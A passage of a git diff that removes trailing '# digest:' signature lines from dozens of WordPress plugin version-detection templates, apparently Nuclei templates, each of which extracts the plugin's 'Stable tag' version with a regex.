b/http/technologies/wordpress/plugins/health-check.yaml index 8886365d49..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a535b4cc5a6483596fbf2f77b260b04f2eb155b96ff5b2453431df502a37ba5b022100a1d8e617d8c58550a47c40d9048d7c49bd5f56785d624907943733537c3746c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index f3941ee197..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008102bf18ba0c53cb9f5346997b953886ac9f1f19066fde55b56c880615a816ed0220097283a74fed9f004472bf3af77db922e7fbac0505dcc31c59832558050f6730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 7389787baf..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e9319c82fec385b48789133577f89a4208ded8e929cd81fc2a3f3a621d5852a0220634dd83ff3642fb204bbb31352467d605a8b650225c15c5fb13e910d1d88ca93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index c378cd06b6..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022056d38547d3e6eaa3f808b92e4971356cc39de4a1a2490440df22fea730f3d2df022100f460add9948e27a8a5fb8eb058e3f1092edb7856929a2ff79614eae0758cc6fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 61e33af879..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2d8648dead9c7ba862f28121138fbf0322240b046f40f583efc2cfaec0b3d0002200f0494a5552c534d12a2c3fa69dd2d4cf0ad0466ca9dbe7690b6dd336eb5de75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 0ac945fe6c..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020b64c214bdbae07808ff87f625e48c97d952d402687775e9cdc1427251885b40221009cac3e880ed467b7e86a8aa526a9275c63f3220fd650f599c4643e4b6d07df4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 85dca09d05..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aaa474f442fe717a5599b84f44e760428f06e7d7a87fd6bc53b4156a1108287c0221009be9c658b6d8b00a92874cf46306d0d912c991ea74563168fe90c92c236b7f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 09dee41d54..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204801b758b6aa71256e8286c8310d0d71d8a6f710bf7bdc5701e7cc942e588be20221009d330c47d6e5b27cec91b5c7c9004eca4963ce12e33e724fdfcc07e82512016a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index a52dc9735f..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053740a49846f85c4bb1983f02ace0df4c4b526c6deb2bae6840f84c39475b04d022022a322e509274436a3cb6dcd279b0678f1ee59bfd012f688769524e1b089d995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 5c51cb978e..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ede22a3530a1723c832f6d9341d434ae56fbfe1be3df3eaf023d6c93fb0e4dfe022100a58e9550f8528df2634080d0e60fd1d919c859ecd3c13743a892aee29b3aa0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 9d3e90387e..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a623e871ce932f1c3fcafd1dcdc334fb148206897a3fe0ea1a3eceba35a80e5d022100e715c933737f9a932adf75a983025eec0e1cc4187879233bc7060b737c1e4ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index ec59967311..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f9ca59ddb365c4c666ec7e87521fd010afd02f26e11a66a2357dae5af8262df022100f23943f7c0af9a35d02dc224a9ff8328a6f5ea4b4989759db427a2232c35ba6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index fd24e035c0..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e6d917f9a396f1c5e7a9036b3d4b57a5f8af9947518a01030899060ebb1465c3022100be25d0a7c22e87857b5b3baae47f000e4c72f6d8e48399caffc30e76dff049ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 24ab3a3a8f..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3b550b5220c6bb4910737602d7888b6a639393b6890b24f54462dce4936943b022100c7291f3bc6567927d5ba3bd2569694fc695e4bc2848c11ecbb412fd9403015df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index ec601e3357..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079ceb998948d76e0224e64d454bb740761c8e64a783b027be424f5c47b1dc96102203b27d025c9f5b753c021c864b52d4058e9a5a0d4a17192fed8ed6d6f30d8fd53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 0fadf5f7e5..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fd011ac56574f4c14393314f5030a3aab902b4882040b026d22ccb0d81bafc102210099d3d62aa889b06d7f8fa9b1cb3505c2b2d79b9e8958c9841bbec3823e352b13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 9647261e55..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204db348148cdbaaf9c9cdd69a97bbe1dfec5e83b498d23c98d60b5e8e3a95e116022100bc994fd115b98fca6b9c8c278951b6594eb528c337a896241a023c3457192ae4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index ea74498125..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021e0fc8856438eb9efc38e0923f5abac3314e4f340ff87831554e1a54bdc49c802200d8d2f092d62352bd4e0e60de51ce10d6eb508e872f96058a0677912540b4cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 809d6500a8..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c608e58aadac597e9df1b35ad322a8788636597622b18955926b1b34d6f59105022100aee66f91fcba192153599d0110fb9fc649699561a7ee5e3ffff406854f6b2b7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index de446e3d5e..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205c7d7b8bc7ccfb84add7960300c7fe6a4eebd942645f5bba7e8c06f36f1ed37c02205f4eeb226d6f1d7823e2e7897a75b6cfdb0df2a635d033ad35cb36f63ffdef12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 15a042f257..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0b1666c7967bc6dab413312775344a686df5cda8d76754b9ed82ad09a1e1aa1022100ec625096c60cff7a12aab9c0b3b8a646612f67dc06a3b59ad7ab4cda4d57241d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8c969171c0..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ee3e076d9d450f77aeaf5f82c5508790da782b4528bd9ba331fd9f62160e908022100d1d92dce30c381b6b8355b129670add214fde4c59f45f2848750c0440133fdf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index bf6b08df78..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220539f78e26a6aa217c4828639c851f50a20d6edf7ddbd67e27a85adb52a3aa13802205d9aad27355348dd0a96f39ae6ad262267b2f13ff409e93d8dd56c66763947f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 2ea69152f3..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220474dcdbd7071db156fdb90bf0d04e5f527a8a96f07673f41824b7dc78d7f30fd022100d16a7b1c7369250ffb079f6ac03390ab6d923e427d98099ed57f40892583e113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index c91413bd5c..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c1f1d075e74ab2517ab90d390897ee26a9d76bb1d7aaa0839b4853ae8811919022054ec4bf1267fba5b02ab8f46809ffb90a42af2a7c8e90e035901e1e21bbc1536:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 5eb01964a5..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220207d69a7a1fa0514872b349924a4278e6e3a9f656b3aa9ad5b18b894200b5eff02206207b846c878968581de06bed87c3b1c1ba4a1ead8f67c43e0a63b86086089e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 7569977413..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ed772f8af2a1f4f4a412d225fcb8f2289aa17c8f95a4b85d16ce387866314c4c022100f8186c610bc6cf02a2b6d8ef4953f056eac0cb91052151d16ab4a311632e8fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 823d909d42..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009bcf764e9f3dc2e92356b658b827fa3ae273f619470a44c299fa9e039795f4240220763dd785279af595159ae48a1d0168d687785490ab4c8a56c6b9c2ec6a659298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 72466cd6c1..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402210097cfeae17e1229c61f71fab510238dd6092349535168ab6f87cf360b4ae87925021f7699e50ecd46ef873cb5669102b9e980341e0801f27345ea25f3819ed74dcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 4dba1252a8..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078aa6ece72b2e438658f55842fa8084a22f2269b7ef98081192877f71805a94702204e0b2e94799e722cbea0bc5f4424c3cd85401a932d093f02265b7f4b2e8b8e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 96dafab406..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100beed566a6785c22bc6f70f9dc741f800657bccc6cbe087e798a4aef5deaeea1502200b4f0ebea21be98c873498541255ef7611faf56f794c47c400ad23788cd2c207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 65cc1eb6b8..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5129f2f8275a5879acdee919da2a12dabfa33f0ae39745420bdeba38f1e18a602203cc49d7398d7bdd68281267f39857cb874f918b236acafe04a74d71e53c1b660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 44cf1147c8..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2e5e8c407bbaaf376ea5a4208f867002922097b0cc0d395a9ee831d13edd7e5022100b53addfbcdd40a498883c2a7901fbecddc818b8fc6ddd9d43d0eab6ba3d58c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 46171c8d96..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202046305f7428851d17fde71c95c9d6442eeb2cf9aa01638ecd4b79a01943e07702201c1b7b571c480bc474d370286a7627413e8267bd8eb3a1bc32259303ed2558d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index e267f54d72..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202fd1a0878c5aea260526994ff7eb23627c41fbfab79604dc00a1029ee1c30c8f02210098584a84d79716b5d779e4e057cc7798cf236343f0d5de582c2cfb8b92a4848a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index a44e4aae0b..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f5772eac7f83c143b2ca73c6ebd0a332a992728376af33038799e33c2cf2020022100b390768cf10a7239864ee854508d430ba1e67394e9692dae87c895cfa1bce96e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 5b803d6e68..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066bfffc64973f4bd5a21c19b1d198a24768a239e0669fbb6c04c18837c22973902206fffd9aa1b03213e66642b33819bdc1871c2b944e3819d560d2fdc96bfa30556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index d4b250007c..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce1c17023b14c4916f6c34dd11d3bcfe173c2ea1710ee69e90f06b407f30cdcf0221009f0454c7604e51c6a5ce92ca4f9bcfed9f8a7242c641919804f33974757b6ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 248b596443..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c12303dd00086f4a7cf4f5a41b3a1e8b45e8ff7b41afd4ea4579a65c106315e1022100900b19cb6e0f9d51f49698f404fe53d10df9e82d668d7545df9d6d08e981b563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index fa09956673..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fcf8caf7813f2f40afde6946b6c3b233ab23e4a160cfc9b6b4141d88248fe49102210090de491443af1b18902a487a6cace7e56f67bd1eef74bcc12bc430a03603148a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 28f33d8cfd..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc8168a6adda7351ac169c17187b5c3a722f7e79cfec8a9fe7602f3dd97d4d83022100a274bbb3e6c2a27e09e3219d2aa62ca9f8efe603867a3ab836447500f2d00f04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index be383e6b9e..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0ec7b611a7e283c67d26821b2033bd2a832035b2f5fd38ae40e121173da77d502201c8c1ebf8826ce8e4c5bfd9d9fec4b43de0e8d833da05c7512fa120cd350af53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e1239a51f4..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220345323739d17a08a87a7c422092304ed313956e5c9c438769b4843364c0efc7a02207e6e19efe959e89795ed31cc805c8e83f9e992792fc2e09ad047225e9c797931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 6fe90dbf5f..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d6d4378846ac12f618c83bb3d86ef10aea1ab6f95b3bce5d12eba4c2812d48bf02210094ca5660a4309b906d80a03c388f57a8051d8eb7dde112df92aee5ec53dfd455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index b9869c7b99..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053c9d8122368b7585d84e48deadce616e848c4ef2dcb1b748dcbed6e9127775002210094b70ca92c6b44fa6b3e129b8111b10c3c219a7f41a6621d0a9bc3acf825e253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index a61fb41153..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210088483fd0b8c651c1854b527c339d4b6bc772f36accd9c6b237f34a6e49db5a90022058812ae5e5a05a4606a39bd9f6b97ee06202b73543c718387a0ce6f20e532370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 76d7cae0f8..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204bc06d286066a35798dc84541fcbb5d8382483f65710cc4404bd72db231113fa0221008ce0cb23b1ae31d0e07a5780702e6696b5e0f8b761004102d66cd24890fdbc6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index dfc3b14a84..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 